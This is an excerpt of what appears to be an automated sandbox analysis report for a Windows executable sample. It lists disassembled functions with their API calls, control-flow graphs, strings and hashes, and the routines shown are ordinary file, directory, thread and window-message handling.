                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000,1AC349C0,?,?,00000001,00000000,009CA603,000000FF,?,009A90B9,?,?,00995630,?), ref: 009A752A
                                                              • CloseHandle.KERNELBASE(?,?,?,009A90B9,?,?,00995630,?,?,?,00000000,?,?,?,00000001,?), ref: 009A7544
                                                              • DeleteCriticalSection.KERNEL32(?,?,009A90B9,?,?,00995630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 009A755D
                                                              • CloseHandle.KERNEL32(?,?,009A90B9,?,?,00995630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 009A7569
                                                              • CloseHandle.KERNEL32(?,?,009A90B9,?,?,00995630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 009A7575
                                                                • Part of subcall function 009A75ED: WaitForSingleObject.KERNEL32(?,000000FF,009A770A,?,?,009A777F,?,?,?,?,?,009A7769), ref: 009A75F3
                                                                • Part of subcall function 009A75ED: GetLastError.KERNEL32(?,?,009A777F,?,?,?,?,?,009A7769), ref: 009A75FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: a8568b4eaad83264f81755647e0d381270cd1e3d9a1269b2d8108189a6d14e83
                                                              • Instruction ID: 4355065b16ece73a22310548b3a1b20095b090df561519286d43f7e0f25bd337
                                                              • Opcode Fuzzy Hash: a8568b4eaad83264f81755647e0d381270cd1e3d9a1269b2d8108189a6d14e83
                                                              • Instruction Fuzzy Hash: 7111C4B2808704EFC722DFA4DC85FC6FBA9FB09750F00492AF15A92160CB71A941DBA4
                                                              Function 009B0678 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1134 9b0678-9b0691 PeekMessageW 1135 9b06cc-9b06ce 1134->1135 1136 9b0693-9b06a7 GetMessageW 1134->1136 1137 9b06a9-9b06b6 IsDialogMessageW 1136->1137 1138 9b06b8-9b06c6 TranslateMessage DispatchMessageW 1136->1138 1137->1135 1137->1138 1138->1135
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009B0689
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B069A
                                                              • IsDialogMessageW.USER32(000103EA,?), ref: 009B06AE
                                                              • TranslateMessage.USER32(?), ref: 009B06BC
                                                              • DispatchMessageW.USER32(?), ref: 009B06C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: 710b44df428f54bf3d6f1a64b5ab7573903de055786d6a5a11cc07a378cd9d75
                                                              • Instruction ID: 36abb8eaf2c13ebe38afe6b8b3978f81f912ee5310ae3bda954ba71e7ea2b798
                                                              • Opcode Fuzzy Hash: 710b44df428f54bf3d6f1a64b5ab7573903de055786d6a5a11cc07a378cd9d75
                                                              • Instruction Fuzzy Hash: 9AF054B1D1A25AABCF20ABE2EC8CEDBBFBCEE452A17004410F506D2010E724D905DBF1
                                                              Function 009B2813 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1139 9b2813-9b2845 call 997673 1142 9b284a-9b2850 1139->1142 1143 9b2847 1139->1143 1144 9b2abd 1142->1144 1145 9b2856-9b285b 1142->1145 1143->1142 1148 9b2abf-9b2ac3 1144->1148 1146 9b285d 1145->1146 1147 9b2860-9b286e 1145->1147 1146->1147 1149 9b2870-9b287c 1147->1149 1150 9b2896 1147->1150 1151 9b2ace-9b2ad2 1148->1151 1152 9b2ac5-9b2ac8 1148->1152 1149->1150 1153 9b287e 1149->1153 1154 9b2899-9b289c 1150->1154 1156 9b2af7 1151->1156 1157 9b2ad4-9b2ad7 1151->1157 1155 9b2aca-9b2acc 1152->1155 1152->1156 1158 9b2884-9b2888 1153->1158 1159 9b28a2-9b28a7 1154->1159 1160 9b2ab7 1154->1160 1161 9b2ada-9b2af2 call 997673 call 9b38a0 1155->1161 1163 9b34ad-9b3500 call 9958cb 1156->1163 1157->1156 1162 9b2ad9 1157->1162 1164 9b288e-9b2894 1158->1164 1165 9b29f0-9b29f2 1158->1165 1166 9b28a9 1159->1166 1167 9b28ac-9b28d7 call 9bacee call 991afc 1159->1167 1160->1144 1161->1156 1162->1161 1178 9b3502 1163->1178 1179 9b3504-9b3514 call 9a0d1d 1163->1179 1164->1150 1164->1158 1165->1150 1169 9b29f8-9b29fc 1165->1169 1166->1167 1167->1163 1182 9b28dd-9b28e1 1167->1182 1169->1154 1178->1179 1188 9b356a-9b356f call 9b5787 1179->1188 1189 9b3516-9b351c 1179->1189 1183 9b28e3 1182->1183 1184 9b28e5-9b28ec 1182->1184 1183->1184 1186 9b28ee 1184->1186 1187 9b28f1-9b292f call 99120c call 9a645a 1184->1187 1186->1187 1205 9b2935-9b2937 1187->1205 1192 9b351e 1189->1192 1193 9b3520-9b3526 1189->1193 1192->1193 1196 9b3528-9b3531 call 9a13da 1193->1196 1197 9b3533-9b3565 call 999733 call 991150 call 9925a4 call 991a66 * 2 1193->1197 1196->1188 1196->1197 1197->1188 1207 9b293d-9b299f call 9914a7 call 99adaa call 991a66 call 9914a7 call 99adaa call 991a66 1205->1207 1208 9b2a01-9b2a07 1205->1208 1242 9b29a1-9b29a3 1207->1242 1243 9b29a4-9b29d2 call 9914a7 call 99adaa call 991a66 1207->1243 1210 9b2a09-9b2a24 1208->1210 1211 9b2a4e-9b2a68 1208->1211 1214 9b2a26-9b2a3f call 9919a9 1210->1214 1215 9b2a45-9b2a4d call 9b5726 1210->1215 1217 9b2a6a-9b2a85 1211->1217 1218 9b2aaf-9b2ab5 1211->1218 1214->1215 1215->1211 1223 9b2a87-9b2aa0 call 9919a9 1217->1223 1224 9b2aa6-9b2aae call 9b5726 1217->1224 1218->1148 1223->1224 1224->1218 1242->1243 1250 9b29d7-9b29eb call 9a645a 1243->1250 1251 9b29d4-9b29d6 1243->1251 1250->1205 1251->1250
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: HIDE$MAX$MIN
                                                              • API String ID: 176396367-2426493550
                                                              • Opcode ID: 2166a92c22296d106ac75ef1d76fb8154757e6a4b09c1e1b81ee6a9954594cee
                                                              • Instruction ID: 02c046b3d76544c02181c30bb18d5fabfb24803e6e7272e02892a37efab96e36
                                                              • Opcode Fuzzy Hash: 2166a92c22296d106ac75ef1d76fb8154757e6a4b09c1e1b81ee6a9954594cee
                                                              • Instruction Fuzzy Hash: 8AB1AE71C00259DACF25DBA8CD85BDDBBB8FF89320F14059AE404B7181DB74AE89CB51
                                                              Function 009AF2CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1254 9af2ce-9af2f7 GetClassNameW 1255 9af2f9-9af30e call 9a8da4 1254->1255 1256 9af31f-9af321 1254->1256 1262 9af31e 1255->1262 1263 9af310-9af31c FindWindowExW 1255->1263 1258 9af32c-9af338 call 9b5734 1256->1258 1259 9af323-9af326 SHAutoComplete 1256->1259 1259->1258 1262->1256 1263->1262
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 009AF2EF
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 009AF326
                                                                • Part of subcall function 009A8DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,009A0E3F,?,?,?,00000046,009A1ECE,00000046,?,exe,00000046), ref: 009A8DBA
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 009AF316
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: EDIT
                                                              • API String ID: 4243998846-3080729518
                                                              • Opcode ID: 39946397e3fb355d1319c95ce273d4ceadc140e728f5e6aa71b940deeb069dca
                                                              • Instruction ID: 957e0976d647547dff4f90a517a0bc2259d1828345e188fafa4180179eecc657
                                                              • Opcode Fuzzy Hash: 39946397e3fb355d1319c95ce273d4ceadc140e728f5e6aa71b940deeb069dca
                                                              • Instruction Fuzzy Hash: 8EF0C831705218ABDF20AB649D45FDFB7AC9F86B51F010065B900EB1C0DA70AE0596A9
                                                              Function 009AF4D4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 009A6C5E: __EH_prolog3_GS.LIBCMT ref: 009A6C65
                                                                • Part of subcall function 009A6C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 009A6C9A
                                                              • OleInitialize.OLE32(00000000), ref: 009AF4ED
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 009AF524
                                                              • SHGetMalloc.SHELL32(009E532C), ref: 009AF52E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                              • String ID: riched20.dll
                                                              • API String ID: 2446841611-3360196438
                                                              • Opcode ID: d3f76acc5f95ce11f4646daa74cdfdb4c82d876b7d44b4582c907bb72f02ed4e
                                                              • Instruction ID: 985d16394f35796ba044fa332f3e024976e5006a164e86466da663f2b1eb45a7
                                                              • Opcode Fuzzy Hash: d3f76acc5f95ce11f4646daa74cdfdb4c82d876b7d44b4582c907bb72f02ed4e
                                                              • Instruction Fuzzy Hash: 02F049B1C04209ABCB10AF99C849AEEFBFCEF84305F00405AE401E2240D7B85A058BA1
                                                              Function 0099E948 Relevance: 6.1, APIs: 4, Instructions: 117fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1269 99e948-99e961 call 9b57d8 1272 99e96a-99e974 1269->1272 1273 99e963-99e965 1269->1273 1274 99e988 1272->1274 1275 99e976-99e983 GetStdHandle 1272->1275 1276 99eaa6-99eaab call 9b5787 1273->1276 1278 99e98b-99e998 1274->1278 1277 99ea6f-99ea72 1275->1277 1277->1278 1280 99e99a-99e99e 1278->1280 1281 99e9df-99e9f4 WriteFile 1278->1281 1283 99e9ff-99ea03 1280->1283 1284 99e9a0-99e9ab 1280->1284 1285 99e9f7-99e9f9 1281->1285 1288 99ea9f-99eaa2 1283->1288 1289 99ea09-99ea0d 1283->1289 1286 99e9ad 1284->1286 1287 99e9af-99e9ce WriteFile 1284->1287 1285->1283 1285->1288 1286->1287 1287->1285 1290 99e9d0-99e9db 1287->1290 1288->1276 1289->1288 1291 99ea13-99ea25 call 999230 1289->1291 1290->1284 1292 99e9dd 1290->1292 1295 99ea77-99ea9a call 9914a7 call 999653 call 991a66 1291->1295 1296 99ea27-99ea30 1291->1296 1292->1285 1295->1288 1296->1278 1297 99ea36-99ea3a 1296->1297 1297->1278 1299 99ea40-99ea6c 1297->1299 1299->1277
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099E94F
                                                              • GetStdHandle.KERNEL32(000000F5,0000002C,009A2D28,?,?,?,?,00000000,009AABB6,?,?,?,?,?,009AA80E,?), ref: 0099E978
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0099E9BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FileH_prolog3_HandleWrite
                                                              • String ID:
                                                              • API String ID: 2898186245-0
                                                              • Opcode ID: 14560d8c378cb65485c977b619dbf0f6a5b0dbfa7e7167a056b82993e1b18f1d
                                                              • Instruction ID: 34e7e3094a94a5d2ba7e90a346df5c080c5a27c9003b7b852b6a44a64bae1f56
                                                              • Opcode Fuzzy Hash: 14560d8c378cb65485c977b619dbf0f6a5b0dbfa7e7167a056b82993e1b18f1d
                                                              • Instruction Fuzzy Hash: E241BD75A05219EFEF14DFA8D884BADBBBABF84711F044118F801AB290CB759D44CBA1
                                                              Function 0099EFEF Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1308 99efef-99f00a call 9b57d8 call 9a13da 1313 99f00c-99f00f 1308->1313 1314 99f031-99f033 1308->1314 1313->1314 1315 99f011-99f017 1313->1315 1316 99f035-99f03d call 99ed0d 1314->1316 1317 99f019 1315->1317 1318 99f01b-99f029 CreateDirectoryW 1315->1318 1325 99f0e3-99f0f0 GetLastError 1316->1325 1326 99f043-99f065 call 9a169a 1316->1326 1317->1318 1320 99f02f 1318->1320 1321 99f0d0-99f0d4 1318->1321 1320->1316 1323 99f0df-99f0e1 1321->1323 1324 99f0d6-99f0da call 99f58b 1321->1324 1329 99f0fb-99f100 call 9b5787 1323->1329 1324->1323 1325->1329 1330 99f0f2-99f0fa 1325->1330 1333 99f07d-99f087 1326->1333 1334 99f067-99f06e 1326->1334 1330->1329 1338 99f089-99f09e 1333->1338 1339 99f0bc-99f0ce 1333->1339 1336 99f070 1334->1336 1337 99f073-99f07b CreateDirectoryW 1334->1337 1336->1337 1337->1333 1340 99f0a0-99f0b0 call 9919a9 1338->1340 1341 99f0b3-99f0bb call 9b5726 1338->1341 1339->1321 1339->1325 1340->1341 1341->1339
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099EFF6
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,0099EBA7,?,00000001,00000000,?,?,00000024,0099A4DE,?,00000001,?,?), ref: 0099F01F
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,0099EBA7,?,00000001,00000000,?,?,00000024,0099A4DE,?), ref: 0099F075
                                                              • GetLastError.KERNEL32(?,?,00000024,0099EBA7,?,00000001,00000000,?,?,00000024,0099A4DE,?,00000001,?,?,00000000), ref: 0099F0E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                              • String ID:
                                                              • API String ID: 3709856315-0
                                                              • Opcode ID: cb6981f08dbcf0aa210a3d82fe946dc86dcd4fa529a7119f137c6563d982ef6e
                                                              • Instruction ID: 14328acffcf9bb3f96e9d81e7b8c86550a80400bf6302fbd01653972aebdf1f2
                                                              • Opcode Fuzzy Hash: cb6981f08dbcf0aa210a3d82fe946dc86dcd4fa529a7119f137c6563d982ef6e
                                                              • Instruction Fuzzy Hash: BA316D71D10209DBDF10DFADC998AEEFBBCAF88310F14442AE501E3252CB749985CB65
                                                              Function 0099E019 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E029
                                                              • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E041
                                                              • GetLastError.KERNEL32(?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E073
                                                              • GetLastError.KERNEL32(?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E092
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: a671b22433691520d2b7722975efcbd2cba35f2a5d54bab1a97a6719e2af2aaa
                                                              • Instruction ID: cc121176402fe90778d6108aceda689f7b297c74d8d70d1915aa768233c80786
                                                              • Opcode Fuzzy Hash: a671b22433691520d2b7722975efcbd2cba35f2a5d54bab1a97a6719e2af2aaa
                                                              • Instruction Fuzzy Hash: F4118E30918208EBDF30DF68C808B6E3BADFB45361F504A29E42A85190D7F5DE44AB61
                                                              Function 009A7628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 009A764C
                                                              • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,0099736D,00995AB0,?), ref: 009A7693
                                                                • Part of subcall function 009992EB: __EH_prolog3_GS.LIBCMT ref: 009992F2
                                                                • Part of subcall function 00999500: __EH_prolog3_GS.LIBCMT ref: 00999507
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_Thread$CreatePriority
                                                              • String ID: CreateThread failed
                                                              • API String ID: 3138599208-3849766595
                                                              • Opcode ID: 801460dbc799dc60e446ccd9ccfa10aec4746784ddd4bdad0240ef4a5e80d431
                                                              • Instruction ID: 8e5e7ce01b4b872677d1a5e0c509f70a18152e619b50bb5e1d568fe8142df7b0
                                                              • Opcode Fuzzy Hash: 801460dbc799dc60e446ccd9ccfa10aec4746784ddd4bdad0240ef4a5e80d431
                                                              • Instruction Fuzzy Hash: FE01DBB538C7056BE720BF9CDC82F66739CEB81715F10002DF54596180CAF16801C679
                                                              Function 0099DE9A Relevance: 4.6, APIs: 3, Instructions: 115fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099DEA1
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,0099E8F5,?,?,0099A6B9,?,00000011,?), ref: 0099DF15
                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,0099D303,?,?,?), ref: 0099DF65
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 1771569470-0
                                                              • Opcode ID: 9045ffffba909561ea54075f3df6d9d00b5714da32eae2700df84f937e989a44
                                                              • Instruction ID: 6537931bfe3b0694659876d5c14c92560967f924420de5b7b52fa90baf4a4bfc
                                                              • Opcode Fuzzy Hash: 9045ffffba909561ea54075f3df6d9d00b5714da32eae2700df84f937e989a44
                                                              • Instruction Fuzzy Hash: 8F416FB0D112089FDF14DFA8D8CABEEB7F8EB48320F10461EE456A7281D774A9448B24
                                                              Function 009A6C5E Relevance: 4.6, APIs: 3, Instructions: 90libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009A6C65
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 009A6C9A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 009A6D0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1552931673-0
                                                              • Opcode ID: bcafb5c58bc56ffec504dd847d0bf833ffe427cee89801e990d4d56d984c7f30
                                                              • Instruction ID: 0b2c25929c1236c448c40c934b83b37f6ab0af257de82750f4169dc9f38c6bbe
                                                              • Opcode Fuzzy Hash: bcafb5c58bc56ffec504dd847d0bf833ffe427cee89801e990d4d56d984c7f30
                                                              • Instruction Fuzzy Hash: DF316B71D00249DEDF04DBE8C889BEEBBB8BF89324F14011EE105B7281DB745A45CBA1
                                                              Function 0099F58B Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099F592
                                                              • SetFileAttributesW.KERNELBASE(?,?,00000024,0099A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0099F5A8
                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099F5EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2559025557-0
